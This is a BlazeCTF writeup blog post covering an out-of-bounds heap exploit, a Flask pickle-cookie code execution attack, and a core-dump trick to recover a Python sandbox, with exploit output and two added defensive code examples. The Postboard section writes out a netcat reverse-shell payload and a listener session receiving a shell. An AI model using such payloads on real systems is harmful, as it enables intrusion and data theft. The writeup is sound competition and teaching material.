Hi

I participated in BlazeCTF in my free time with the irGeeks team, and it seems we got 2nd place at the end. Here you can see some of my brief writeups.

dmail

Dmail was a pwnable task with plenty of security mechanisms enabled:

gdb-peda$ checksec 
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : FULL
gdb-peda$ 

A little bit of work with the executable reveals the vulnerability. In the sending_mail function you have to set an index. The index is not properly checked, so you can abuse it for out-of-bounds reading and writing. In order to pwn the task we have to do the following:
1. leak a heap address
2. leak a libc .bss address (the arena)
3. calculate libc_base and exe_base
4. calculate the address of one of the saved stack frame pointers
5. overwrite that frame pointer with a controllable address
6. pwn!

TL;DR

hamidx9@expl:~/ctf/blaze/dmail$ python sol.py 
[+] Opening connection to 107.170.17.158 on port 4201: Done
[DEBUG] 1
[DEBUG] 2
[DEBUG] 3
[DEBUG] 4
[DEBUG] 5
[DEBUG] -1
[DEBUG] -1
libc_bss: 0x7f0cf2967000
libc_base: 0x7f0cf25a9000
exe_base: 0x7f0cf2b93000
[DEBUG] 72
[DEBUG] -1
heap_base: 0x7f0cf3b71000
[DEBUG] 73
[DEBUG] 4
[DEBUG] 103
fgets_got: 0x7f0cf2617060
[DEBUG] 4
[DEBUG] 103
libc_start: 0x7f0cf25c9dd0
[DEBUG] 4
[DEBUG] 103
mapped_addr: 0x7f0cf2d8d040
[DEBUG] 4
[DEBUG] 103
cookie_leak_addr: 0x7f0cf2d8c768
cookie_leak: 0xd819065973d8bc00
[DEBUG] 4
[DEBUG] 103
stacl_addr: 0x7fff7f745bf0
rbp_loc: 0x7fff7f745b80
[DEBUG] 2
[DEBUG] 3
[DEBUG] 130215815534
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /home/dmail/dmail_flag
blaze{Congratulations, you've unlocked your first BlazeCTF recipe, DANK GARLICBREAD, the recipes button above the scoreboard should now be unlocked}
$  

You can see my exploit below with some comments. We got 420 pts. Full exploit: sol.py

Postboard

This was a web task built with Flask that saved some posts online.
Before starting, the server reads the flag and saves it into posts['flag']. You can see the full server code here.

In Flask the session is stored in a client-side cookie. So if we can generate an arbitrary pickle dump and use it as our cookie, we can run arbitrary code.
We also know the secret, so the following procedure should do it:

  1. generate a pickle dump of something like os.system("nc ip_address 4444 -e /bin/sh") and use it as the cookie.
  2. The server connects back to my machine and we have a shell.

But ../flagdir/flag is owned by root and has 700 permissions. Instead we can read the flag from the global dict posts. A pickle dump of something like this finishes the task:

import os; nn=posts.get("flag"); fl=open("/tmp/shell", "w"); mm=fl.write(nn.i); fl.close()

Since I had a shell on the /tmp/shell FIFO, I just wrote the flag into it.

hamidx@ubuntu:~$ nc -l -v 4444
Listening on [0.0.0.0] (family 0, port 4444)
aConnection from [46.101.248.243] port 4444 [tcp/*] accepted (family 2, sport 40810)
ls
ls
index.html
login.html
nc
newpost.html
register.html
server2.py
server.py
server.pyc
ls -la ../flagdir/
total 12
drwxrwxr-x 2 root root 4096 Apr 20 20:58 .
drwxr-xr-x 4 post post 4096 Apr 20 20:39 ..
-rwx------ 1 root root   50 Apr 20 20:58 flag
BLAZE{pickle_is_super_secure_with_signing_right?}

Full exploits: sol.py, flag_to_sock.py

Here we have another 420 pts.
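The defensive contrast the flag hints at, as an added example that is not part of this writeup or of the challenge's server code: a session cookie that signs JSON (data only, as Flask itself does) next to a restricted unpickler that refuses every global reference, so neither a leaked secret nor a crafted pickle gives code execution. SECRET, SAFE_BUILTINS and the two sample pickles are constructed for the demo.

```python
import base64, builtins, hashlib, hmac, io, json, pickle

SECRET = b"constructed-demo-secret"  # constructed; a real app loads this from config
# Only plain data types may be resolved on load; any other global (os.system, ...) is refused.
SAFE_BUILTINS = {"dict", "list", "set", "tuple", "str", "int", "float", "bool", "bytes"}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is consulted for every global reference in the stream; rejecting
    everything outside SAFE_BUILTINS means no callable can be resolved, let alone run."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def restricted_loads(data: bytes):
    """Load a pickle, returning the object or the UnpicklingError that blocked it."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return exc


def sign_session(session: dict) -> str:
    """JSON can only express data, so a leaked SECRET lets an attacker forge values, not code."""
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode())
    return body.decode() + "." + hmac.new(SECRET, body, hashlib.sha256).hexdigest()


def load_session(cookie: str):
    """Return the session dict, or None if the cookie is malformed or its MAC fails to verify."""
    body, sep, mac = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


# Constructed samples: plain data, and a pickle holding a global reference (to the harmless
# json.dumps). The restricted loader treats that reference like any other callable and refuses it.
DATA_PICKLE = pickle.dumps({"user": "alice"})
GLOBAL_PICKLE = pickle.dumps(json.dumps)
```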

mpi

I couldn't find a good infoleak in time to pwn the challenge, but I had a write-what-where condition easily.

write-what-where.py

snake

This was a Python task again. Of course we could unpack the custom UPX first, but I had a better solution:

hamidx9@expl:~/ctf/blaze/snake$ ./snake &
[1] 22987
hamidx9@expl:~/ctf/blaze/snake$ 
Let's go on a date a21df
Prove to me you're worth it
$ 

[1]+  Stopped                 ./snake
hamidx9@expl:~/ctf/blaze/snake$ 
hamidx9@expl:~/ctf/blaze/snake$ ps x
  PID TTY      STAT   TIME COMMAND
16502 ?        S      0:01 sshd: hamidx9@pts/3 
16503 pts/3    Ss+    0:00 -bash
17110 ?        S      0:00 sshd: hamidx9@pts/8 
17111 pts/8    Ss+    0:00 -bash
21244 ?        R      0:00 sshd: hamidx9@pts/0 
21245 pts/0    Ss     0:00 -bash
22987 pts/0    T      0:00 ./snake
22988 pts/0    T      0:00 ./snake
22989 pts/0    R+     0:00 ps x
hamidx9@expl:~/ctf/blaze/snake$ gcore 22988

Program received signal SIGTTIN, Stopped (tty input).
0x00007f81eae19810 in ?? ()
Saved corefile core.22988
hamidx9@expl:~/ctf/blaze/snake$ ls
core.15870  core.15871  core.22988  log.txt  mem1  q.py  snake  upx-3.91-amd64_linux  upx-3.91-amd64_linux.tar.bz2
hamidx9@expl:~/ctf/blaze/snake$ strings -a core.22988 | grep '#!/usr/bin/python'
#!/usr/bin/python
#!/usr/bin/python
hamidx9@expl:~/ctf/blaze/snake$ strings -a core.22988 | grep '#!/usr/bin/python' -A10
#!/usr/bin/python
# -*- coding: utf=8 -*-
import datetime
import random
import string
import hashlib
from sys import modules
from threading import Thread
from imp import acquire_lock
# Flag is not in a file.
def validation(attempt):
--
#!/usr/bin/python
# -*- coding: utf=8 -*-
import datetime
import random
import string
import hashlib
from sys import modules
from threading import Thread
from imp import acquire_lock
# Flag is not in a file.
def validation(attempt):
hamidx9@expl:~/ctf/blaze/snake$ 

Here you can see the Python sandbox and verification procedure: task.py

It seems the sandbox did not delete the datetime module. Anyway, I had no time to pwn the challenge.
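The same carving the strings/grep pipeline above does, as an added Python example that is not part of the writeup: it scans a memory image for every shebang-led, NUL-terminated script and de-duplicates the repeated copies. SAMPLE_CORE, SCRIPT_A and SCRIPT_B are constructed stand-ins for core.22988 and its contents.

```python
import re

# Shebang that opens each copy of the interpreter's script inside the dump.
SHEBANG = re.compile(rb"#!/usr/bin/(?:env )?python[0-9.]*\n")


def carve_scripts(image: bytes, max_len: int = 1 << 20) -> list:
    """Return every distinct NUL-terminated Python script embedded in a memory image,
    in order of first appearance; a core usually holds the same script more than once."""
    seen, scripts = set(), []
    for match in SHEBANG.finditer(image):
        start = match.start()
        end = image.find(b"\x00", start, start + max_len)
        if end == -1:  # unterminated: take at most max_len bytes
            end = min(len(image), start + max_len)
        chunk = image[start:end]
        if chunk in seen:
            continue
        seen.add(chunk)
        scripts.append(chunk.decode("utf-8", errors="replace"))
    return scripts


# Constructed stand-in for a core file: ELF-ish noise, two identical copies of a script
# (as the strings output in the writeup showed) and one different script.
SCRIPT_A = (b"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport datetime\n"
            b"# Flag is not in a file.\ndef validation(attempt):\n    pass\n")
SCRIPT_B = b"#!/usr/bin/python\nimport string\nprint('helper')\n"
SAMPLE_CORE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"\xde\xad" + SCRIPT_A + b"\x00"
               + b"\xff" * 5 + SCRIPT_B + b"\x00" + b"\x90" * 3 + SCRIPT_A + b"\x00trailer")
```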

Regards,

Hamid Zamani
